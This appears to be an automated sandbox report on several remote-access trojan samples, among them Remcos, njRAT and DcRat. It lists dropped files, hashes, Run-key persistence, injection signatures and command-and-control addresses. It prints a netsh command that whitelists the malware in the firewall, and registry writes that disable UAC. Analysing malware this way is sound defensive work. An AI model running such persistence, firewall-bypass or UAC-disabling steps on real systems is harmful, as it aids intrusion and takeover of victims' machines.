"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 127.0.0.1:7000 | | tcp |
| N/A | 127.0.0.1:7000 | | tcp |
Files
memory/2096-0-0x000007FEF53E3000-0x000007FEF53E4000-memory.dmp
memory/2096-1-0x0000000000980000-0x00000000009D6000-memory.dmp
C:\Users\Admin\AppData\Roaming\XClient.exe
| MD5 | e0918682feb10b28a39a9cfbf4d2d90c |
| SHA1 | c33f8518747e96955387bac3c8299eea24357fe0 |
| SHA256 | 8f7a69675281f0e5f2fd0b43c64434fdb132fdca1eb82cf23aa947f83c833d01 |
| SHA512 | dcb3961832197bf33b4e554a69b95a17c847fccde7211ca96ee0a9ad975a051f93e6f29a3a9525279b2aaf9d6b7208a8ddeb8c1d430e79ddf4155f5629038fa7 |
memory/2640-13-0x0000000000EF0000-0x0000000000F36000-memory.dmp
C:\Users\Admin\AppData\Roaming\Output.exe
| MD5 | 3ac2fbaa37549eb0c50eedbca0da41c2 |
| SHA1 | a486d241a02989d2adbff9785c7c39e68a2934af |
| SHA256 | 815021055de7349aafb51c6788bfd8f1a0f9fc242e842d6b8bf639283a4658fd |
| SHA512 | 76ac7165eba850a34e9dd459c538e1e0ceaee09896e711dabc1272c76a0a79b0826124cec4c43d626b390c222367af55b3de452312e51725f994d218cbe0e7f7 |
memory/2488-75-0x000007FEF53E0000-0x000007FEF5DCC000-memory.dmp
memory/2488-76-0x000007FEF53E0000-0x000007FEF5DCC000-memory.dmp
memory/2488-16-0x000007FEF53E0000-0x000007FEF5DCC000-memory.dmp
memory/2488-9-0x0000000000EA0000-0x0000000000EB2000-memory.dmp
Analysis: behavioral31
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win7-20250207-en
Max time kernel
139s
Max time network
150s
Command Line
Signatures
Remcos
Remcos family
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1c2345047abfb5daed017769f13254053b7c8cfe14027982065835c6a4bc9aa0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Windows\CurrentVersion\Run\Application = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\sbietrcl.exe" | C:\Users\Admin\AppData\Local\Temp\1c2345047abfb5daed017769f13254053b7c8cfe14027982065835c6a4bc9aa0.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2912 set thread context of 3044 | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1c2345047abfb5daed017769f13254053b7c8cfe14027982065835c6a4bc9aa0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1c2345047abfb5daed017769f13254053b7c8cfe14027982065835c6a4bc9aa0.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\1c2345047abfb5daed017769f13254053b7c8cfe14027982065835c6a4bc9aa0.exe
"C:\Users\Admin\AppData\Local\Temp\1c2345047abfb5daed017769f13254053b7c8cfe14027982065835c6a4bc9aa0.exe"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe"
Network
| Country | Destination | Domain | Proto |
| RU | 213.183.58.19:4000 | | tcp |
| RU | 213.183.58.19:4000 | | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.252.143:80 | crl.microsoft.com | tcp |
| RU | 213.183.58.19:4000 | | tcp |
| RU | 213.183.58.19:4000 | | tcp |
| RU | 213.183.58.19:4000 | | tcp |
| RU | 213.183.58.19:4000 | | tcp |
Files
memory/2344-0-0x0000000074E81000-0x0000000074E82000-memory.dmp
memory/2344-8-0x0000000074E80000-0x000000007542B000-memory.dmp
memory/2344-9-0x0000000074E80000-0x000000007542B000-memory.dmp
memory/2344-10-0x0000000074E80000-0x000000007542B000-memory.dmp
memory/2912-29-0x0000000074E80000-0x000000007542B000-memory.dmp
memory/2344-28-0x0000000074E80000-0x000000007542B000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe
| MD5 | 0a18d56f34538070a8a715ec937a8929 |
| SHA1 | 0ae813ceb71e5dc1e4ace6b1def908041bf4b3b4 |
| SHA256 | 8a7e36230788c35f10b15313f478cd339dd30e609bf25d56be769a22a8bc0736 |
| SHA512 | 4264c9e915db1a30901025078828c82c353855f255fbc5ddefe75078dc0f5dc1eaa2a1fe8270c11fc8f051319409fbb2e52938399f51334a43291a7f4a50f8e6 |
C:\Users\Admin\AppData\Local\Temp\CabDDF0.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
memory/2912-37-0x0000000074E80000-0x000000007542B000-memory.dmp
memory/2912-38-0x0000000074E80000-0x000000007542B000-memory.dmp
memory/3044-62-0x0000000000400000-0x0000000000417000-memory.dmp
memory/2912-61-0x0000000074E80000-0x000000007542B000-memory.dmp
memory/3044-60-0x0000000000400000-0x0000000000417000-memory.dmp
memory/3044-59-0x0000000000400000-0x0000000000417000-memory.dmp
memory/3044-56-0x0000000000400000-0x0000000000417000-memory.dmp
memory/3044-55-0x0000000000400000-0x0000000000417000-memory.dmp
memory/3044-52-0x0000000000400000-0x0000000000417000-memory.dmp
memory/3044-50-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/3044-48-0x0000000000400000-0x0000000000417000-memory.dmp
memory/3044-46-0x0000000000400000-0x0000000000417000-memory.dmp
memory/3044-44-0x0000000000400000-0x0000000000417000-memory.dmp
memory/3044-42-0x0000000000400000-0x0000000000417000-memory.dmp
memory/3044-40-0x0000000000400000-0x0000000000417000-memory.dmp
memory/3044-65-0x0000000000400000-0x0000000000417000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win7-20240903-en
Max time kernel
146s
Max time network
147s
Command Line
Signatures
Njrat family
njRAT/Bladabindi
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1a9cd1714a3e518cfd51f84f1be819bf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1a9cd1714a3e518cfd51f84f1be819bf.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\confuse = "C:\\Users\\Admin\\AppData\\Roaming\\confuse\\chargeable.exe" | C:\Users\Admin\AppData\Local\Temp\1a9cd1714a3e518cfd51f84f1be819bf.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysMain = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1a9cd1714a3e518cfd51f84f1be819bf.exe" | C:\Users\Admin\AppData\Local\Temp\1a9cd1714a3e518cfd51f84f1be819bf.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2436 set thread context of 2832 | N/A | C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe | C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1a9cd1714a3e518cfd51f84f1be819bf.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\1a9cd1714a3e518cfd51f84f1be819bf.exe
"C:\Users\Admin\AppData\Local\Temp\1a9cd1714a3e518cfd51f84f1be819bf.exe"
C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe
"C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe"
C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe
C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe" "chargeable.exe" ENABLE
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.252.143:80 | crl.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 23.192.18.101:80 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | doddyfire.linkpc.net | udp |
| MA | 196.119.34.23:10000 | doddyfire.linkpc.net | tcp |
| MA | 196.119.34.23:10000 | doddyfire.linkpc.net | tcp |
| MA | 196.119.34.23:10000 | doddyfire.linkpc.net | tcp |
| MA | 196.119.34.23:10000 | doddyfire.linkpc.net | tcp |
| MA | 196.119.34.23:10000 | doddyfire.linkpc.net | tcp |
| MA | 196.119.34.23:10000 | doddyfire.linkpc.net | tcp |
Files
memory/1792-0-0x0000000074541000-0x0000000074542000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\CabC6E9.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
memory/1792-1-0x0000000074540000-0x0000000074AEB000-memory.dmp
memory/1792-23-0x0000000074540000-0x0000000074AEB000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\TarC6EC.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 83142242e97b8953c386f988aa694e4a |
| SHA1 | 833ed12fc15b356136dcdd27c61a50f59c5c7d50 |
| SHA256 | d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755 |
| SHA512 | bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10 |
C:\Users\Admin\AppData\Local\Temp\TarC986.tmp
| MD5 | 109cab5505f5e065b63d01361467a83b |
| SHA1 | 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc |
| SHA256 | ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673 |
| SHA512 | 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 961dcab7b4519de9b2959e37b9acd44d |
| SHA1 | af9819559394cc28e9dace6762ba1ac3a2ab90f6 |
| SHA256 | d91056bfdf292f5b7b1e3fd4fc0da907308c4a8a5a28ede7597dc3b52c816ce4 |
| SHA512 | 0c9bda9646a86489408de99903dce44f42827ce771ebe91efbd4b7475125c9180127d396f729bd48ac61202d1c75784735300f343cdee6f2c81dd0b96ffd45c6 |
memory/1792-184-0x0000000074540000-0x0000000074AEB000-memory.dmp
C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe
| MD5 | d85ce7c078fad704704709cfdf6cc6cc |
| SHA1 | 11a6f9f84f7dcda89c4ae1a4da2b5e2dbbdd396e |
| SHA256 | 2dcbcee32b967f6559e0aa2d151a0cbedf7f218e25c59437bfc5a27b463ead2d |
| SHA512 | dab904dc1071cce585c2fda5fa70e5acd64985ef3fec7ff3c0f6268dd29d3d687d0d99a607a4a6e5987333e24e98d9740a1d3d942dd410dcb4cc14ee41972870 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C0018BB1B5834735BFA60CD063B31956
| MD5 | 1ea27366e034eb9447a33ce639c01489 |
| SHA1 | d12ed3e7e60c65ce90f0a58b9b9e47292caed923 |
| SHA256 | 788d210ef206a4d11b6b506bf52124ee03fca4e8a9389fad43772202a7e29452 |
| SHA512 | e06f7443f0f7ca5db4411aa0718102c08068e95ec305b6b53c0b42a941a877de39f95c7e7514e69316b41a7ac19eaa6ccddc581fe475bdb842ec920691726e49 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C0018BB1B5834735BFA60CD063B31956
| MD5 | 4ea113be8aaac780e38eebd189c6f4ec |
| SHA1 | 94c79c5ae47fdb125258188bdf8bf5c7647da214 |
| SHA256 | e8cc316fbaab36d49e1fd45afb5888bc6af41d89e4f02866f9f393ed8917fe09 |
| SHA512 | 54699b354150f3eb7db1319e27a9dd6b663396e2183259a6e143c4c4def393498fc797f78896abf0bf4ec3807857b3943ecaed7103d1bf36a379b39c9e80b795 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\37C951188967C8EB88D99893D9D191FE
| MD5 | 3b5e0bd6640456a749d9155e6c135727 |
| SHA1 | 7d985e42e7df8cac3cf7ec917df10b9fbef09a21 |
| SHA256 | c362a3d2b661c6066a02fc169faaa1976c2f6160da5837c7e68b7e0f67b794ed |
| SHA512 | b1b669bad519dccab5224c8fcdb13bb2b015e22fd30ba57e92c9cde4480e655f19f0bbb862db5fd87828d2a3ab74c4a6090f36b6358f9eefe5c82e024afe4a3e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\37C951188967C8EB88D99893D9D191FE
| MD5 | 986d462ad9a78fe82b53b4d11378f7bb |
| SHA1 | 5486751c9cd15b8859d567760d6515051d0266a0 |
| SHA256 | daf8bf7df824637a59589ad97f2939e674f7b6c5ccf0d6186f9214dc14245590 |
| SHA512 | 5cc6fb85ffbb942bd0e01666cf3cc976155fc3f6c683a6ad8d6e44cabdf04d59b16f17772ba5b88f3bfcf3db92cc5053bc8432efe920fe755ac0080fdb99f5c5 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 40df535c351f239056edfb75868b5198 |
| SHA1 | 06f70046e3efa59a9fa3803ed7252952087ec38a |
| SHA256 | 0f33b43515d31fb3774c03779fff8a50783eff7521dbc18ff37ec9f555c7ac62 |
| SHA512 | 57c9d6ac831da0ee2bed3cf08500467965fa7e65d2e3bd0af470aac72ffcec43d836f88b80291073650331d82046e14b13bd1ccfb78890c58dd17de38517e813 |
memory/1792-194-0x0000000074540000-0x0000000074AEB000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 1e8ee1b4414c537fd2a8de0f8b2a055a |
| SHA1 | 756824cedb7593bbd72d66adf74e81ed2e93cca8 |
| SHA256 | e42360a439b896ac6c8e24befa7114900f2455eae37c8794d2289bc0f70fba77 |
| SHA512 | 000db366827f53bfd4b6e9624c03337c49ca406dd871f4363d46d93ee03b9e233ab8ed8aa334173668e8a8d4a671337564dbd5c2ddf2151cfed5e87cd8885368 |
memory/2832-366-0x0000000000400000-0x000000000040C000-memory.dmp
memory/2832-365-0x0000000000400000-0x000000000040C000-memory.dmp
memory/2832-363-0x0000000000400000-0x000000000040C000-memory.dmp
Analysis: behavioral25
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win7-20250207-en
Max time kernel
117s
Max time network
120s
Command Line
Signatures
DcRat
Dcrat family
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1bb302f6b26022b9f405c4a06c165b236837688e94ea312a231c8f780e63d2b3.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\1bb302f6b26022b9f405c4a06c165b236837688e94ea312a231c8f780e63d2b3.exe
"C:\Users\Admin\AppData\Local\Temp\1bb302f6b26022b9f405c4a06c165b236837688e94ea312a231c8f780e63d2b3.exe"
Network
Files
memory/2596-0-0x000007FEF5EA3000-0x000007FEF5EA4000-memory.dmp
memory/2596-1-0x0000000000280000-0x000000000048A000-memory.dmp
memory/2596-2-0x000007FEF5EA0000-0x000007FEF688C000-memory.dmp
memory/2596-3-0x0000000000250000-0x000000000025E000-memory.dmp
memory/2596-4-0x0000000000260000-0x000000000026E000-memory.dmp
memory/2596-5-0x000007FEF5EA0000-0x000007FEF688C000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win10v2004-20250314-en
Max time kernel
147s
Max time network
148s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
